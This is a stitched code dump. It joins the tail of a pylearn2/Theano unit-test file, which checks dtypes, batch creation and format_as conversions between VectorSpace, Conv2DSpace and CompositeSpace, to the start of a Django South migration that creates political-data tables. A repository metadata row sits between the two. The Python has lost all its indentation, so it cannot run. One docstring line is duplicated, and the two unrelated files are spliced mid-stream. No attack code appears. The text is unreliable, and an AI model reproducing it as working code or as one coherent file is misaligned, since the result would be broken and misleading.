# Sparse VectorSpaces throw an exception if batch_size is specified.
if not (isinstance(from_space, VectorSpace) and from_space.sparse):
kwargs['batch_size'] = batch_size
if underspecifies_dtypes(from_space, to_type):
try:
from_space.make_theano_batch(**kwargs)
except TypeError as ex:
assert dtype_is_none_msg in str(ex)
except Exception as unexpected_ex:
print("Expected an exception of type TypeError with message "
"%s, got a %s instead with message %s." %
(dtype_is_none_msg,
type(unexpected_ex),
str(unexpected_ex)))
raise unexpected_ex
finally:
return
batch = from_space.make_theano_batch(**kwargs)
assert get_batch_dtype(batch) == get_expected_batch_dtype(from_space,
to_type)
def test_format(from_space, to_space, using_numeric_batch):
"""
Unit test for a call to from_space.np_format_as(batch, to_space)
"""
# Type-checks the arguments
for space, name in zip((from_space, to_space),
("from_space", "to_space")):
if not isinstance(space,
(VectorSpace, Conv2DSpace, CompositeSpace)):
raise TypeError("This test only supports spaces of type "
"VectorSpace, Conv2DSpace, and "
"CompositeSpace, not %s's type %s" %
(name, type(space)))
def get_batch(space, using_numeric_batch):
"""
            Uses space.get_origin_batch() to return a numeric batch,
            or space.make_theano_batch() to return a symbolic batch.
            Uses a fallback dtype if the space itself doesn't have one.
"""
def specifies_all_dtypes(space):
"""
Returns True iff space has a completely specified dtype.
"""
if isinstance(space, CompositeSpace):
return all(specifies_all_dtypes(subspace)
for subspace in space.components)
else:
return space.dtype is not None
def replace_none_dtypes(dtype, fallback_dtype):
"""
Returns dtype, with any Nones replaced by fallback_dtype.
"""
if isinstance(dtype, tuple):
return tuple(replace_none_dtypes(d, fallback_dtype)
for d in dtype)
else:
return fallback_dtype if dtype is None else dtype
kwargs = {"batch_size": batch_size}
# Use this when space doesn't specify a dtype
fallback_dtype = theano.config.floatX
if not specifies_all_dtypes(space):
kwargs["dtype"] = replace_none_dtypes(space.dtype,
fallback_dtype)
if using_numeric_batch:
return space.get_origin_batch(**kwargs)
else:
# Sparse VectorSpaces throw an exception if batch_size is
# specified
if isinstance(space, VectorSpace) and space.sparse:
del kwargs["batch_size"]
kwargs["name"] = "space-generated batch"
return space.make_theano_batch(**kwargs)
def get_expected_warning(from_space, from_batch, to_space):
# composite -> composite
if isinstance(from_space, CompositeSpace) and \
isinstance(to_space, CompositeSpace):
for fs, fb, ts in safe_zip(from_space.components,
from_batch,
to_space.components):
warning, message = get_expected_warning(fs, fb, ts)
if warning is not None:
return warning, message
return None, None
# composite -> simple
if isinstance(from_space, CompositeSpace):
for fs, fb in safe_zip(from_space.components, from_batch):
warning, message = get_expected_warning(fs, fb, to_space)
if warning is not None:
return warning, message
return None, None
# simple -> composite
if isinstance(to_space, CompositeSpace):
if isinstance(from_space, VectorSpace) and \
isinstance(from_batch, theano.sparse.SparseVariable):
assert from_space.sparse
return (UserWarning,
'Formatting from a sparse VectorSpace to a '
'CompositeSpace is currently (2 Jan 2014) a '
'non-differentiable action. This is because it '
'calls slicing operations on a sparse batch '
'(e.g. "my_matrix[r:R, c:C]", which Theano does '
'not yet have a gradient operator for. If '
'autodifferentiation is reporting an error, '
'this may be why.')
for ts in to_space.components:
warning, message = get_expected_warning(from_space,
from_batch,
ts)
if warning is not None:
return warning, message
return None, None
# simple -> simple
return None, None
def get_expected_error(from_space, from_batch, to_space):
"""
Returns the type of error to be expected when calling
from_space.np_format_as(batch, to_space). Returns None if no error
should be expected.
"""
def contains_different_dtypes(space):
"""
Returns true if space contains different dtypes. None is
considered distinct from all actual dtypes.
"""
assert isinstance(space, CompositeSpace)
def get_shared_dtype_if_any(space):
"""
Returns space's dtype. If space is composite, returns the
dtype used by all of its subcomponents. Returns False if
the subcomponents use different dtypes.
"""
if isinstance(space, CompositeSpace):
dtypes = tuple(get_shared_dtype_if_any(c)
for c in space.components)
assert(len(dtypes) > 0)
if any(d != dtypes[0] for d in dtypes[1:]):
return False
return dtypes[0] # could be False, but that's fine
else:
return space.dtype
return get_shared_dtype_if_any(space) is False
assert (isinstance(from_space, CompositeSpace) ==
isinstance(from_batch, tuple))
# composite -> composite
if isinstance(from_space, CompositeSpace) and \
isinstance(to_space, CompositeSpace):
for fs, fb, ts in safe_zip(from_space.components,
from_batch,
to_space.components):
error, message = get_expected_error(fs, fb, ts)
if error is not None:
return error, message
return None, None
# composite -> simple
if isinstance(from_space, CompositeSpace):
if isinstance(to_space, Conv2DSpace):
return (NotImplementedError,
"CompositeSpace does not know how to format as "
"Conv2DSpace")
for fs, fb in safe_zip(from_space.components, from_batch):
error, message = get_expected_error(fs, fb, to_space)
if error is not None:
return error, message
if isinstance(to_space, VectorSpace) and \
contains_different_dtypes(from_space) and \
to_space.dtype is None:
return (TypeError,
"Tried to format components with differing dtypes "
"into a VectorSpace with no dtype of its own. "
"dtypes: ")
return None, None
# simple -> composite
if isinstance(to_space, CompositeSpace):
if isinstance(from_space, VectorSpace) and \
isinstance(from_batch, theano.sparse.SparseVariable):
assert from_space.sparse
return (UserWarning,
'Formatting from a sparse VectorSpace to a '
'CompositeSpace is currently (2 Jan 2014) a '
'non-differentiable action. This is because it '
'calls slicing operations on a sparse batch '
'(e.g. "my_matrix[r:R, c:C]", which Theano does '
'not yet have a gradient operator for. If '
'autodifferentiation is reporting an error, '
'this may be why.')
if isinstance(from_space, Conv2DSpace):
return (NotImplementedError,
"Conv2DSpace does not know how to format as "
"CompositeSpace")
for ts in to_space.components:
error, message = get_expected_error(from_space,
from_batch,
ts)
if error is not None:
return error, message
return None, None
#
# simple -> simple
#
def is_sparse(space):
return isinstance(space, VectorSpace) and space.sparse
def is_complex(arg):
"""
Returns whether a space or a batch has a complex dtype.
"""
return (arg.dtype is not None and
str(arg.dtype).startswith('complex'))
if isinstance(from_batch, tuple):
return (TypeError,
"This space only supports simple dtypes, but received "
"a composite batch.")
if is_complex(from_batch) and not is_complex(from_space):
return (TypeError,
"This space has a non-complex dtype (%s), and "
"thus cannot support complex batches of type %s." %
(from_space.dtype, from_batch.dtype))
if from_space.dtype is not None and \
from_space.dtype != from_batch.dtype:
return (TypeError,
"This space is for dtype %s, but recieved a "
"batch of dtype %s." %
(from_space.dtype, from_batch.dtype))
if is_sparse(from_space) and isinstance(to_space, Conv2DSpace):
return (TypeError,
"Formatting a SparseVariable to a Conv2DSpace "
"is not supported, since neither scipy nor "
"Theano has sparse tensors with more than 2 "
"dimensions. We need 4 dimensions to "
"represent a Conv2DSpace batch")
if is_complex(from_space) and not is_complex(to_space):
if is_symbolic_batch(from_batch):
return (TypeError,
"Casting from complex to real is ambiguous")
else:
return (np.ComplexWarning,
"Casting complex values to real discards the "
"imaginary part")
return None, None
def get_expected_formatted_dtype(from_batch, to_space):
"""
Returns the expected dtype of the batch returned from a call to
from_batch.format_as(batch, to_space). If the returned batch is a
nested tuple, the expected dtype will also a nested tuple.
"""
def get_single_dtype(batch):
"""
Returns the dtype shared by all leaf nodes of the nested batch.
                Returns the dtype shared by all leaf nodes of the nested batch.
                If the nested batch contains differing dtypes, this returns
                False. None counts as a different dtype than non-None.
"""
if isinstance(batch, tuple):
assert len(batch) > 0
child_dtypes = tuple(get_single_dtype(b) for b in batch)
if any(c != child_dtypes[0] for c in child_dtypes[1:]):
return False
return child_dtypes[0] # may be False, but that's correct.
else:
return batch.dtype
# composite -> composite
if isinstance(from_batch, tuple) and \
isinstance(to_space, CompositeSpace):
return tuple(get_expected_formatted_dtype(b, s)
for b, s in safe_zip(from_batch,
to_space.components))
# composite -> simple
elif isinstance(from_batch, tuple):
if to_space.dtype is not None:
return to_space.dtype
else:
result = get_batch_dtype(from_batch)
if result is False:
raise TypeError("From_batch doesn't have a single "
"dtype: %s" %
str(get_batch_dtype(from_batch)))
return result
# simple -> composite
elif isinstance(to_space, CompositeSpace):
return tuple(get_expected_formatted_dtype(from_batch, s)
for s in to_space.components)
# simple -> simple with no dtype
elif to_space.dtype is None:
assert from_batch.dtype is not None
return str(from_batch.dtype)
# simple -> simple with a dtype
else:
return to_space.dtype
from_batch = get_batch(from_space, using_numeric_batch)
expected_error, expected_error_msg = get_expected_error(from_space,
from_batch,
to_space)
# For some reason, the "with assert_raises(expected_error) as context:"
        # idiom isn't catching all the expected errors. Use this instead:
if expected_error is not None:
try:
# temporarily upgrades warnings to exceptions within this block
with warnings.catch_warnings():
warnings.simplefilter("error")
from_space._format_as(using_numeric_batch,
from_batch,
to_space)
except expected_error as ex:
assert str(ex).find(expected_error_msg) >= 0
except Exception as unknown_ex:
print("Expected exception of type %s, got %s." %
(expected_error.__name__, type(unknown_ex)))
raise unknown_ex
finally:
return
to_batch = from_space._format_as(using_numeric_batch,
from_batch,
to_space)
expected_dtypes = get_expected_formatted_dtype(from_batch, to_space)
actual_dtypes = get_batch_dtype(to_batch)
assert expected_dtypes == actual_dtypes, \
("\nexpected_dtypes: %s,\n"
"actual_dtypes: %s \n"
"from_space: %s\n"
"from_batch's dtype: %s\n"
"from_batch is theano?: %s\n"
"to_space: %s" % (expected_dtypes,
actual_dtypes,
from_space,
get_batch_dtype(from_batch),
is_symbolic_batch(from_batch),
to_space))
#
#
# End of test_format() function.
def test_dtype_getter(space):
"""
Tests the getter method of space's dtype property.
"""
def assert_composite_dtype_eq(space, dtype):
"""
Asserts that dtype is a nested tuple with exactly the same tree
structure as space, and that the dtypes of space's components and
their corresponding elements in <dtype> are equal.
"""
assert (isinstance(space, CompositeSpace) ==
isinstance(dtype, tuple))
if isinstance(space, CompositeSpace):
for s, d in safe_zip(space.components, dtype):
assert_composite_dtype_eq(s, d)
else:
assert space.dtype == dtype
if isinstance(space, SimplyTypedSpace):
assert space.dtype == space._dtype
elif isinstance(space, NullSpace):
assert space.dtype == "NullSpace's dtype"
elif isinstance(space, CompositeSpace):
assert_composite_dtype_eq(space, space.dtype)
def test_dtype_setter(space, dtype):
"""
Tests the setter method of space's dtype property.
"""
def get_expected_error(space, dtype):
"""
If calling space.dtype = dtype is expected to throw an exception,
this returns (exception_class, exception_message).
If no exception is to be expected, this returns (None, None).
"""
if isinstance(space, CompositeSpace):
if isinstance(dtype, tuple):
if len(space.components) != len(dtype):
return ValueError, "Argument 0 has length "
for s, d in safe_zip(space.components, dtype):
error, message = get_expected_error(s, d)
if error is not None:
return error, message
else:
for s in space.components:
error, message = get_expected_error(s, dtype)
if error is not None:
return error, message
return None, None
if isinstance(space, SimplyTypedSpace):
if not any((dtype is None,
dtype == 'floatX',
dtype in all_scalar_dtypes)):
return (TypeError,
'Unrecognized value "%s" (type %s) for dtype arg' %
(dtype, type(dtype)))
return None, None
if isinstance(space, NullSpace):
nullspace_dtype = NullSpace().dtype
if dtype != nullspace_dtype:
return (TypeError,
'NullSpace can only take the bogus dtype "%s"' %
nullspace_dtype)
return None, None
raise NotImplementedError("%s not yet supported by this test" %
type(space))
def assert_dtype_equiv(space, dtype):
"""
Asserts that space.dtype and dtype are equivalent.
"""
if isinstance(space, CompositeSpace):
if isinstance(dtype, tuple):
for s, d in safe_zip(space.components, dtype):
assert_dtype_equiv(s, d)
else:
for s in space.components:
assert_dtype_equiv(s, dtype)
else:
assert not isinstance(dtype, tuple)
if dtype == 'floatX':
dtype = theano.config.floatX
assert space.dtype == dtype, ("%s not equal to %s" %
(space.dtype, dtype))
expected_error, expected_message = get_expected_error(space, dtype)
if expected_error is not None:
try:
space.dtype = dtype
except expected_error as ex:
assert expected_message in str(ex)
            except Exception as ex:
print("Expected exception of type %s, got %s instead." %
(expected_error.__name__, type(ex)))
raise ex
return
else:
space.dtype = dtype
assert_dtype_equiv(space, dtype)
def test_simply_typed_space_validate(space, batch_dtype, is_numeric):
"""
Creates a batch of batch_dtype, and sees if space validates it.
"""
assert isinstance(space, SimplyTypedSpace), \
"%s is not a SimplyTypedSpace" % type(space)
batch_sizes = (1, 3)
if not is_numeric and isinstance(space, VectorSpace) and space.sparse:
batch_sizes = (None, )
for batch_size in batch_sizes:
if is_numeric:
batch = space.get_origin_batch(dtype=batch_dtype,
batch_size=batch_size)
else:
batch = space.make_theano_batch(dtype=batch_dtype,
batch_size=batch_size,
name="test batch to validate")
# Expect an error if space.dtype is not None and batch can't cast
# to it.
if space.dtype is not None and \
not np.can_cast(batch.dtype, space.dtype):
np.testing.assert_raises(TypeError,
space._validate,
(is_numeric, batch))
else:
# Otherwise, don't expect an error.
space._validate(is_numeric, batch)
#
#
# End of test_dtype_setter() function
shape = np.array([2, 3, 4], dtype='int')
assert len(shape) == 3 # This test depends on this being true
dtypes = ('floatX', None) + all_scalar_dtypes
#
# spaces with the same number of elements
#
vector_spaces = tuple(VectorSpace(dim=shape.prod(), dtype=dt, sparse=s)
for dt in dtypes for s in (True, False))
conv2d_spaces = tuple(Conv2DSpace(shape=shape[:2],
dtype=dt,
num_channels=shape[2])
for dt in dtypes)
# no need to make CompositeSpaces with components spanning all possible
# dtypes. Just try 2 dtype combos. No need to try different sparsities
# either. That will be tested by the non-composite space conversions.
n_dtypes = 2
old_nchannels = shape[2]
shape[2] = old_nchannels / 2
assert shape[2] * 2 == old_nchannels, \
("test code is broken: # of channels should start as an even "
"number, not %d." % old_nchannels)
def make_composite_space(dtype0, dtype1, use_conv2d):
if use_conv2d:
second_space = Conv2DSpace(shape=shape[:2],
dtype=dtype1,
num_channels=shape[2])
else:
second_space = VectorSpace(dim=np.prod(shape),
dtype=dtype1)
return CompositeSpace((VectorSpace(dim=shape.prod(), dtype=dtype0),
second_space))
composite_spaces = tuple(make_composite_space(dtype0, dtype1, use_conv2d)
for dtype0, dtype1 in zip(dtypes[:n_dtypes],
dtypes[-n_dtypes:])
for use_conv2d in [True, False])
del n_dtypes
# A few composite dtypes to try throwing at CompositeSpace's batch-making
# methods.
composite_dtypes = ((None, 'int8'),
('complex128', theano.config.floatX))
# Tests CompositeSpace's batch-making methods and dtype setter
# with composite dtypes
for from_space in composite_spaces:
for to_dtype in composite_dtypes:
test_get_origin_batch(from_space, to_dtype)
test_make_shared_batch(from_space, to_dtype)
test_make_theano_batch(from_space, to_dtype)
test_dtype_setter(from_space, to_dtype)
# Tests validate/np_validate() for SimplyTypedSpaces
for is_numeric in (True, False):
for space in vector_spaces + conv2d_spaces:
for batch_dtype in ('floatX', ) + all_scalar_dtypes:
# Skip the test if the symbolic SparseType does not implement
# that dtype. As of 2015-05-07, this happens for 'float16'.
if ((isinstance(space, VectorSpace) and
space.sparse and
batch_dtype in all_scalar_dtypes and
batch_dtype not in theano.sparse.SparseType.dtype_set)):
continue
test_simply_typed_space_validate(space,
batch_dtype,
is_numeric)
all_spaces = vector_spaces + conv2d_spaces + composite_spaces
for from_space in all_spaces:
test_dtype_getter(from_space)
# Tests batch-making and dtype setting methods with non-composite
# dtypes.
for to_dtype in dtypes:
# Skip the test if the symbolic SparseType does not implement
# that dtype. As of 2015-05-07, this happens for 'float16'.
if ((isinstance(from_space, VectorSpace) and
from_space.sparse and
to_dtype in all_scalar_dtypes and
to_dtype not in theano.sparse.SparseType.dtype_set)):
continue
test_get_origin_batch(from_space, to_dtype)
test_make_shared_batch(from_space, to_dtype)
test_make_theano_batch(from_space, to_dtype)
test_dtype_setter(from_space, to_dtype)
# Tests _format_as
for to_space in all_spaces:
# Skip the test if the symbolic SparseType does not implement
# that dtype. As of 2015-05-07, this happens for 'float16'.
if ((isinstance(to_space, VectorSpace) and
to_space.sparse and
to_space.dtype in all_scalar_dtypes and
to_space.dtype not in theano.sparse.SparseType.dtype_set)):
continue
for is_numeric in (True, False):
test_format(from_space, to_space, is_numeric)
def test_symbolic_undo_format_as():
"""
Test functionality of undo_format_as on symbolic batches.
After format_as and undo_format_as, the theano variable
should be the same object, not just an equivalent
variable.
"""
# Compare identity of Composite batches
def assert_components(batch1, batch2):
for e1, e2 in zip(batch1, batch2):
if isinstance(e1, tuple) and isinstance(e2, tuple):
assert_components(e1, e2)
elif isinstance(e1, tuple) or isinstance(e2, tuple):
raise ValueError('Composite batches do not match.')
else:
assert e1 is e2
# VectorSpace and Conv2DSpace
VS = VectorSpace(dim=27)
VS_sparse = VectorSpace(dim=27, sparse=True)
# VectorSpace to Sparse VectorSpace
VS_batch = VS.make_theano_batch()
new_SVS_batch = VS.format_as(VS_batch, VS_sparse)
new_VS_batch = VS.undo_format_as(new_SVS_batch, VS_sparse)
assert new_VS_batch is VS_batch
assert new_SVS_batch is not VS_batch
# ConvSpace to ConvSpace
CS = Conv2DSpace(shape=[3, 3],
num_channels=3,
axes=('b', 0, 1, 'c'),
dtype='float32')
CS_non_default = Conv2DSpace(shape=[3, 3],
num_channels=3,
axes=('c', 'b', 0, 1),
dtype='float64')
CS_batch = CS.make_theano_batch()
new_ndCS_batch = CS.format_as(CS_batch, CS_non_default)
new_CS_batch = CS.undo_format_as(new_ndCS_batch, CS_non_default)
assert new_CS_batch is CS_batch
assert new_ndCS_batch is not CS_batch
assert new_ndCS_batch.dtype == 'float64'
assert new_CS_batch.dtype == 'float32'
ndCS_batch = CS_non_default.make_theano_batch()
new_CS_batch = CS_non_default.format_as(ndCS_batch, CS)
new_ndCS_batch = CS_non_default.undo_format_as(new_CS_batch, CS)
assert new_ndCS_batch is ndCS_batch
assert new_CS_batch is not ndCS_batch
assert new_ndCS_batch.dtype == 'float64'
assert new_CS_batch.dtype == 'float32'
# Start in VectorSpace
VS_batch = VS.make_theano_batch()
new_CS_batch = VS.format_as(VS_batch, CS)
new_VS_batch = VS.undo_format_as(new_CS_batch, CS)
assert new_VS_batch is VS_batch
new_CS_batch = VS.format_as(VS_batch, CS_non_default)
new_VS_batch = VS.undo_format_as(new_CS_batch, CS_non_default)
assert new_VS_batch is VS_batch
# Start in Conv2D with default axes
CS_batch = CS.make_theano_batch()
new_VS_batch = CS.format_as(CS_batch, VS)
new_CS_batch = CS.undo_format_as(new_VS_batch, VS)
assert new_CS_batch is CS_batch
# Non-default axes
CS_batch = CS_non_default.make_theano_batch()
new_VS_batch = CS_non_default.format_as(CS_batch, VS)
new_CS_batch = CS_non_default.undo_format_as(new_VS_batch, VS)
assert new_CS_batch is CS_batch
# Composite Space to VectorSpace
VS = VectorSpace(dim=27)
CS = Conv2DSpace(shape=[2, 2], num_channels=3, axes=('b', 0, 1, 'c'))
CompS = CompositeSpace((CompositeSpace((VS, VS)), CS))
VS_large = VectorSpace(dim=(2*27+12))
CompS_batch = CompS.make_theano_batch()
new_VS_batch = CompS.format_as(CompS_batch, VS_large)
new_CompS_batch = CompS.undo_format_as(new_VS_batch, VS_large)
assert_components(CompS_batch, new_CompS_batch)
# VectorSpace to Composite Space
CompS = CompositeSpace((CompositeSpace((VS, VS)), CS))
VS_batch = VS_large.make_theano_batch()
new_CompS_batch = VS_large.format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_format_as(new_CompS_batch, CompS)
assert VS_batch is new_VS_batch
# Reorder CompositeSpace
CompS = CompositeSpace((VS, CompositeSpace((VS, CS))))
VS_batch = VS_large.make_theano_batch()
new_CompS_batch = VS_large.format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_format_as(new_CompS_batch, CompS)
assert VS_batch is new_VS_batch
# Reorder CompositeSpace
CompS = CompositeSpace((CompositeSpace((CompositeSpace((VS,)), CS)), VS))
VS_batch = VS_large.make_theano_batch()
new_CompS_batch = VS_large.format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_format_as(new_CompS_batch, CompS)
assert VS_batch is new_VS_batch
# CompositeSpace to CompositeSpace
VS = VectorSpace(dim=27)
CS = Conv2DSpace(shape=[3, 3], num_channels=3, axes=('b', 0, 1, 'c'))
CompS_VS = CompositeSpace((CompositeSpace((VS, VS)), VS))
CompS_CS = CompositeSpace((CompositeSpace((CS, CS)), CS))
CompS_VS_batch = CompS_VS.make_theano_batch()
new_CompS_CS_batch = CompS_VS.format_as(CompS_VS_batch, CompS_CS)
new_CompS_VS_batch = CompS_VS.undo_format_as(new_CompS_CS_batch, CompS_CS)
assert_components(CompS_VS_batch, new_CompS_VS_batch)
def test_numeric_undo_format_as():
"""
Test functionality of undo_np_format_as on numeric batches.
This calls np_format_as with spaces reversed.
"""
# Compare identity of Composite batches
def assert_components(batch1, batch2):
for e1, e2 in zip(batch1, batch2):
if isinstance(e1, tuple) and isinstance(e2, tuple):
assert_components(e1, e2)
elif isinstance(e1, tuple) or isinstance(e2, tuple):
raise ValueError('Composite batches do not match.')
else:
assert np.allclose(e1, e2)
# VectorSpace and Conv2DSpace
VS = VectorSpace(dim=27)
VS_sparse = VectorSpace(dim=27, sparse=True)
# VectorSpace to Sparse VectorSpace
VS_batch = np.arange(270).reshape(10, 27)
new_SVS_batch = VS.np_format_as(VS_batch, VS_sparse)
new_VS_batch = VS.undo_np_format_as(new_SVS_batch, VS_sparse)
assert np.allclose(new_VS_batch, VS_batch)
# ConvSpace to ConvSpace
CS = Conv2DSpace(shape=[3, 3],
num_channels=3,
axes=('b', 0, 1, 'c'),
dtype='float32')
CS_non_default = Conv2DSpace(shape=[3, 3],
num_channels=3,
axes=('c', 'b', 0, 1),
dtype='float64')
CS_batch = np.arange(270).reshape(10, 3, 3, 3).astype('float32')
new_ndCS_batch = CS.np_format_as(CS_batch, CS_non_default)
new_CS_batch = CS.undo_np_format_as(new_ndCS_batch, CS_non_default)
assert np.allclose(new_CS_batch, CS_batch)
assert new_ndCS_batch.shape != CS_batch.shape
assert new_ndCS_batch.dtype == 'float64'
assert new_CS_batch.dtype == 'float32'
ndCS_batch = np.arange(270).reshape(3, 10, 3, 3)
new_CS_batch = CS_non_default.np_format_as(ndCS_batch, CS)
new_ndCS_batch = CS_non_default.undo_np_format_as(new_CS_batch, CS)
assert np.allclose(new_ndCS_batch, ndCS_batch)
assert new_CS_batch.shape != ndCS_batch.shape
assert new_ndCS_batch.dtype == 'float64'
assert new_CS_batch.dtype == 'float32'
# Start in VectorSpace
VS_batch = np.arange(270).reshape(10, 27)
new_CS_batch = VS.np_format_as(VS_batch, CS)
new_VS_batch = VS.undo_np_format_as(new_CS_batch, CS)
assert np.allclose(new_VS_batch, VS_batch)
# Non-default axes
new_CS_batch = VS.np_format_as(VS_batch, CS_non_default)
new_VS_batch = VS.undo_np_format_as(new_CS_batch, CS_non_default)
assert np.allclose(new_VS_batch, VS_batch)
# Start in Conv2D with default axes
CS_batch = np.arange(270).reshape(10, 3, 3, 3)
new_VS_batch = CS.np_format_as(CS_batch, VS)
new_CS_batch = CS.undo_np_format_as(new_VS_batch, VS)
assert np.allclose(new_CS_batch, CS_batch)
# Non-default axes
CS_batch = np.arange(270).reshape(3, 10, 3, 3)
new_VS_batch = CS_non_default.np_format_as(CS_batch, VS)
new_CS_batch = CS_non_default.undo_np_format_as(new_VS_batch, VS)
assert np.allclose(new_CS_batch, CS_batch)
# Composite Space to VectorSpace
VS = VectorSpace(dim=27)
CS = Conv2DSpace(shape=[2, 2], num_channels=3, axes=('b', 0, 1, 'c'))
CompS = CompositeSpace((CompositeSpace((VS, VS)), CS))
VS_large = VectorSpace(dim=(2*27+12))
VS_batch = np.arange(270).reshape(10, 27)
VS_batch2 = 2*np.arange(270).reshape(10, 27)
CS_batch = 3*np.arange(120).reshape(10, 2, 2, 3)
CompS_batch = ((VS_batch, VS_batch2), CS_batch)
new_VS_batch = CompS.np_format_as(CompS_batch, VS_large)
new_CompS_batch = CompS.undo_np_format_as(new_VS_batch, VS_large)
assert_components(CompS_batch, new_CompS_batch)
# VectorSpace to Composite Space
CompS = CompositeSpace((CompositeSpace((VS, VS)), CS))
VS_batch = np.arange((2*27+12)*10).reshape(10, 2*27+12)
new_CompS_batch = VS_large.np_format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_np_format_as(new_CompS_batch, CompS)
assert np.allclose(VS_batch, new_VS_batch)
# Reorder CompositeSpace
CompS = CompositeSpace((VS, CompositeSpace((VS, CS))))
VS_batch = np.arange((2*27+12)*10).reshape(10, 2*27+12)
new_CompS_batch = VS_large.np_format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_np_format_as(new_CompS_batch, CompS)
assert np.allclose(VS_batch, new_VS_batch)
# Reorder CompositeSpace
CompS = CompositeSpace((CompositeSpace((CompositeSpace((VS,)), CS)), VS))
VS_batch = np.arange((2*27+12)*10).reshape(10, 2*27+12)
new_CompS_batch = VS_large.np_format_as(VS_batch, CompS)
new_VS_batch = VS_large.undo_np_format_as(new_CompS_batch, CompS)
assert np.allclose(VS_batch, new_VS_batch)
# CompositeSpace to CompositeSpace
VS = VectorSpace(dim=27)
CS = Conv2DSpace(shape=[3, 3], num_channels=3, axes=('b', 0, 1, 'c'))
VS_batch = np.arange(270).reshape(10, 27)
VS_batch2 = 2*np.arange(270).reshape(10, 27)
VS_batch3 = 3*np.arange(270).reshape(10, 27)
CompS_VS = CompositeSpace((CompositeSpace((VS, VS)), VS))
CompS_CS = CompositeSpace((CompositeSpace((CS, CS)), CS))
CompS_VS_batch = ((VS_batch, VS_batch2), VS_batch3)
new_CompS_CS_batch = CompS_VS.np_format_as(CompS_VS_batch, CompS_CS)
new_CompS_VS_batch = CompS_VS.undo_np_format_as(new_CompS_CS_batch,
CompS_CS)
assert_components(CompS_VS_batch, new_CompS_VS_batch)
| bsd-3-clause | 6,151,758,451,863,893,000 | 40.931457 | 79 | 0.541373 | false |
k0001/mediasancion | mediasancion/core/migrations/0001_initial.py | 1 | 15801 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Distrito'
db.create_table('core_distrito', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('remote_source', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('remote_url', self.gf('django.db.models.fields.URLField')(max_length=1023, blank=True)),
('remote_id', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('origin', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('uuid', self.gf('django.db.models.fields.CharField')(db_index=True, unique=True, max_length=36, blank=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=128)),
('slug', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=50, blank=True)),
))
db.send_create_signal('core', ['Distrito'])
# Adding model 'Partido'
db.create_table('core_partido', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('remote_source', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('remote_url', self.gf('django.db.models.fields.URLField')(max_length=1023, blank=True)),
('remote_id', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('origin', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('uuid', self.gf('django.db.models.fields.CharField')(db_index=True, unique=True, max_length=36, blank=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=50, blank=True)),
))
db.send_create_signal('core', ['Partido'])
# Adding model 'Bloque'
db.create_table('core_bloque', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('remote_source', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('remote_url', self.gf('django.db.models.fields.URLField')(max_length=1023, blank=True)),
('remote_id', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('origin', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('uuid', self.gf('django.db.models.fields.CharField')(db_index=True, unique=True, max_length=36, blank=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=50, blank=True)),
))
db.send_create_signal('core', ['Bloque'])
# Adding model 'Persona'
db.create_table('core_persona', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('remote_source', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('remote_url', self.gf('django.db.models.fields.URLField')(max_length=1023, blank=True)),
('remote_id', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('origin', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('creator', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True)),
('uuid', self.gf('django.db.models.fields.CharField')(db_index=True, unique=True, max_length=36, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(db_index=True, max_length=50, blank=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=128)),
('apellido', self.gf('django.db.models.fields.CharField')(max_length=128)),
('documento_tipo', self.gf('django.db.models.fields.CharField')(max_length=1, null=True, blank=True)),
('documento_numero', self.gf('django.db.models.fields.CharField')(max_length=63, null=True, blank=True)),
('email', self.gf('django.db.models.fields.EmailField')(max_length=75, null=True, blank=True)),
('telefono', self.gf('django.db.models.fields.CharField')(max_length=32, null=True, blank=True)),
('website', self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True)),
('foto', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True)),
))
